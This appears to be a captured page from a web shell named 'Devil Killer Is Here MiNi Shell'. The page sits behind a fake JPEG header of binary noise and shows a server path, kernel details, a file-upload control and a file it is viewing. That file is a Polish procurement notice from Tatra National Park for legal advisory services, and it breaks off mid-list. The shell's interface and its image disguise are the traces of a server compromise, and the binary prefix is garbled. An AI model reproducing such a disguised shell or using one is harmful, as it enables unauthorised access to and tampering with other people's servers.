JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230327/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230327/0015205701-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Zawarcie umowy na doradztwo prawne na rzecz Tatrzańskiego Parku Narodowego- 4 zadania </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">TATRZAŃSKI PARK NARODOWY</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 122456180</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Kuźnice 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Zakopane</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">34-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL219 - Nowotarski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48182023200</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">PRZETARGI@TPN.PL</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.tpn.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Środowisko</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zawarcie umowy na doradztwo prawne na rzecz Tatrzańskiego Parku Narodowego- 4 zadania </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-624789a7-cc87-11ed-9355-06954b8c6cb9</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00152057</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-03-27</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00072779/12/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.15 Bieżąca obsługa prawna w 2023r.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-624789a7-cc87-11ed-9355-06954b8c6cb9 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">OPISANO W SWZ ORAZ ZAŁĄCZNIKACH</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">OPISANO W SWZ ORAZ ZAŁĄCZNIKACH</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">OPISANO W SWZ ORAZ ZAŁĄCZNIKACH</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP/661.1/2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 2.1.	Zadanie 1: doradztwo prawne w zakresie prawa pracy.<br/>2.1.1.	świadczenie usług prawnych, w tym doradztwo prawne i konsultacje prawne, <br/>a także udzielanie wyjaśnień i interpretacji obowiązujących przepisów prawa pracy,<br/>2.1.2.	kompleksową usługę prawną polegającą na utworzeniu regulaminu pracy, w tym zasad badania trzeźwości pracowników, oraz uzgodnienia ze związkami zawodowymi w tym temacie, <br/>2.1.3.	utworzenie i opiniowanie porozumienia w sprawie pracy zdalnej, uwzględniając uzgodnienia ze związkami zawodowymi,<br/>2.1.4.	utworzenie i opiniowanie regulaminu funduszu świadczeń socjalnych uwzględniając uzgodnienia ze związkami zawodowymi,<br/>2.1.5.	utworzenie i opiniowanie regulaminu szkoleń oraz podnoszenia kwalifikacji dla osób zatrudnionych w TPN<br/>2.1.6.	utworzenie i opiniowanie regulaminu zatrudniania w TPN<br/>2.1.7.	pomocy prawnej w zakresie zawierania oraz rozwiązywania umów o pracę; <br/>2.1.8.	sporządzenie wzorów umów dla osób współpracujących na zasadach B2B lub, umów zleceń,<br/>2.1.9.	doradztwa prawnego związanego z poszczególnymi zagadnieniami z zakresu prawa pracy (czas pracy, urlopy, inne)<br/>2.1.10.	analizy umów związanych z funkcjonowaniem działów personalnych (np. umowy dotyczące poszukiwania pracowników);<br/>2.1.11.	Rozliczenie za wykonanie regulaminu pracy będzie na podstawie ceny ryczałtowej podanej w druku oferty, natomiast pozostałe zadania wykonywane w ramach zadania 1 nie mogą przekroczyć łącznie 120 h pracy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79111000-5 - Usługi w zakresie doradztwa prawnego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">79100000-5 - Usługi prawnicze</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">8 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryterium nr 1: Cena - waga kryterium 60%<br/>Kryterium nr 2: Termin płatności faktury – waga kryterium 40.00 %</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności faktury</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 2.2.	Zadanie 2: doradztwo prawne dotyczące tematów związanych z dzierżawami, najmami oraz użyczeniami zgodnie z Kodeksem cywilnym<br/>2.2.1.	Sporządzanie projektów umów do przeprowadzania przetargów na udostępnianie nieruchomości TPN podmiotom zewnętrznym (zgodnie z zasadami przepisów ustawy z dnia 16 kwietnia 2004 roku o ochronie przyrody (t.j. Dz.U.2022.916 ze zm.), Rozporządzenia Ministra Środowiska z dnia 20 lipca 2012 roku w sprawie przetargów oraz rokowań na rozporządzanie nieruchomościami przez parki narodowe (Dz.U. z 2012 r., poz. 868), ustawy z dnia 16 grudnia 2016 roku o zasadach zarządzania mieniem państwowym (tj. Dz.U. 2021 poz.1933) oraz ustawy z dnia 16 grudnia 2016 roku Przepisy wprowadzające ustawę o zasadach zarządzania mieniem państwowym (Dz.U.2016 poz. 2260), przygotowanie ogłoszeń o przetargach spójnych z poszczególnymi projektami umów, prowadzenie sprawy, w tym przygotowanie pism i wyjaśnień zgodnie z zakresem wskazanym przez organ rozpatrujący sprawę, uzyskiwania niezbędnych zgód na zawarcie umowy, weryfikacja ofert złożonych w przetargu, udział w procedurze odwoławczej (nadzór nad korespondencją, przygotowanie pism), przygotowanie wniosków o zmiany w obowiązujących umowach tj. udział w negocjacjach z kontrahentem, przygotowanie projektu aneksu, przygotowanie wniosku o zmianę do organu prowadzącego sprawę i prowadzenie korespondencji w tym zakresie oraz sporządzanie protokołu zdawczo-odbiorczego przy przekazywaniu nieruchomości w związku z zawarciem umowy.<br/>2.2.2.	Opiniowanie czynności związanych z dochodzeniem należności i naliczaniem kar przewidzianych w umowach dotyczących udostępnionych nieruchomości na podstawie zawartych przez TPN umów.<br/>2.2.3.	Prowadzenie spraw związanych z ustanawianiem służebności na rzecz TPN i na rzecz podmiotów zewnętrznych po nieruchomościach TPN, w tym analiza stanu prawnego i możliwości ustanowienia służebności, przygotowanie projektu umowy ustanowienia służebności, uczestniczenie w procesie uzyskiwania niezbędnych zgód, jeśli będą wymagane.<br/>2.2.4.	Doradztwo w zakresie stosowania przepisów ustawy o ochronie przyrody, w szczególności w kontekście zakazów wynikających z art. 15 i odstępstw od zakazów, <br/>art. 12 – udostępnianie i opłaty i za udostępnianie.<br/>2.2.4.1.	Doradztwo w zakresie regulacji stanu prawnego nieruchomości oraz procesu wykupu i wymiany nieruchomości, w tym także w drodze pierwokupu.<br/>2.2.4.2.	doradztwo w zakresie uregulowania stanu prawnego nieruchomości i infrastruktury związanych z funkcjonowaniem elektrowni wodnej w Kuźnicach;<br/>2.2.4.3.	Doradztwo w zakresie podwójnych ksiąg wieczystych i AWZ;<br/>2.2.4.4.	Doradztwo w zakresie uregulowania stanu prawnego nieruchomości zajętych pod drogi publiczne, w szczególności nieruchomości w Kirach, w rejonie wylotu Dol. Małej Łąki, Łysej Polany i Wierch Porońca;<br/>2.2.4.5.	Pierwokupy w granicach TPN w kontekście nieruchomości zabudowanych, lokali mieszkalnych i niemieszkalnych;<br/>2.2.4.6.	Obsługa prawna realizacji porozumienia w sprawie wymian pomiędzy TPN, PTTK i Starostą Tatrzańskim (czuwanie nad procedurą, uzyskiwanie niezbędnych zgód);<br/>2.2.5. Doradztwo przy pisaniu decyzji, postanowień, odwołań, zażaleń i skarg związanych zakresem działania Działu Udostępniania i Zespołu Zagospodarowania Przestrzennego i Stanu Posiadania, w szczególności:<br/>2.2.5.1.	decyzje związane ze zgodami na organizowanie zawodów w TPN, zmiany w tych decyzjach i rozpatrywanie skarg na wydane decyzje,<br/>2.2.5.2.	postanowienia związane z procesem opiniowania i uzgadniania projektów miejscowych planów zagospodarowania przestrzennego i studiów uwarunkowań i kierunków zagospodarowania przestrzennego <br/>2.2.5.3.	uzgadnianie decyzji związanych z procesami inwestycyjnymi w granicach parku (warunki zabudowy i zagospodarowania terenu, ustalenie lokalizacji inwestycji celu publicznego itp.)<br/>2.2.5.4.	zaskarżanie decyzji o pozwoleniu na budowę, wzizt, ulicp itp.<br/>2.2.6.	Łączna ilość godzin pracy w ramach zadania 2 nie może przekroczyć 200 h </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79111000-5 - Usługi w zakresie doradztwa prawnego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">79100000-5 - Usługi prawnicze</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">8 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryterium nr 1: Cena - waga kryterium 60%<br/>Kryterium nr 2: Termin płatności faktury – waga kryterium 40.00 %</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności faktury</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 2.3.	Zadanie 3: doradztwo prawne z zakresu prawa podatkowego<br/>2.3.1.	Audyt podatkowy polegający na analizie deklaracji na podatek od nieruchomości, leśny i rolny składanych do gmin przez TPN w kontekście ich poprawności oraz analiza zakresu nieruchomości (oraz budynków - powierzchnia użytkowa, powierzchnia zajęta na kancelarii i budowli) ujętych w tych deklaracjach z uwzględnieniem zwolnień we wszystkich typach podatku oraz odzyskiwanie należności podatkowych w związku z zawartymi umowami na udostępnienie nieruchomości osobom trzecim. <br/>2.3.1.1.	Analiza bazy środków trwałych jako źródła danych do deklaracji. <br/>2.3.1.2.	Wskazanie błędów oraz rekomendacje co do konieczności wprowadzenia zmian.<br/>2.3.1.3.	Audyt powinien wiązać się też z przeszkoleniem pracowników odpowiedzialnych za przygotowanie deklaracji i danych będących podstawą sporządzenia deklaracji.<br/>2.3.1.4.	Przygotowanie propozycji procedur związanych z aktualizowaniem zmian wpływających na składanie deklaracji.<br/>2.3.1.5.	Audyt powinien zakończyć się sporządzeniem raportu.<br/>2.3.2.	Rozliczenie za realizacje zadania 3 będzie w oparciu o cenę ryczałtową podaną w druku oferty za przygotowanie audytu zgodnie z opisem przedmiotu zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79111000-5 - Usługi w zakresie doradztwa prawnego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">79100000-5 - Usługi prawnicze</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">8 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryterium nr 1: Cena - waga kryterium 60%<br/>Kryterium nr 2: Termin płatności faktury – waga kryterium 40.00 %</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności faktury</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 2.4.	Zadanie 4: doradztwo prawne przy obsłudze postępowania „Stworzenie i uruchomienie wersji mobilnej i desktopowej 23 stron PN oraz jednej strony głównej”<br/>2.4.1.	Sporządzanie projektów umów wraz z załącznikami koniecznych do przeprowadzenia przetargu na drugie postępowanie (wdrożeniowo-programistyczne) w ramach zadania pn. „Stworzenie i uruchomienie wersji mobilnej i desktopowej 23 stron PN oraz jednej strony głównej”, które realizowane jest przez TPN na mocy Pełnomocnictwa (DOP/2/POIŚ/2022) w imieniu i na rzecz Ministerstwa Klimatu i Środowiska w ramach Projektu POIS.02.04.00-00-0001/15 „Promocja Parków Narodowych jako marki”. Zgodnie z którą Pełnomocnik jest odpowiedzialny za wykonanie m.in. następujących czynności związanych z zakresem wsparcia prawnego: <br/>2.4.1.1.	opracowanie umów, harmonogramów i wszelkiej dokumentacji niezbędnej do realizacji przedmiotów zamówień oraz przeprowadzenia postępowań przetargowych (jedno z dwóch już zrealizowane), <br/>2.4.2.	Łączna ilość godzin pracy w ramach zadania 4 nie może przekroczyć 120 h. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79111000-5 - Usługi w zakresie doradztwa prawnego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">79100000-5 - Usługi prawnicze</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">8 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryterium nr 1: Cena - waga kryterium 60%<br/>Kryterium nr 2: Termin płatności faktury – waga kryterium 40.00 %</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności faktury</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 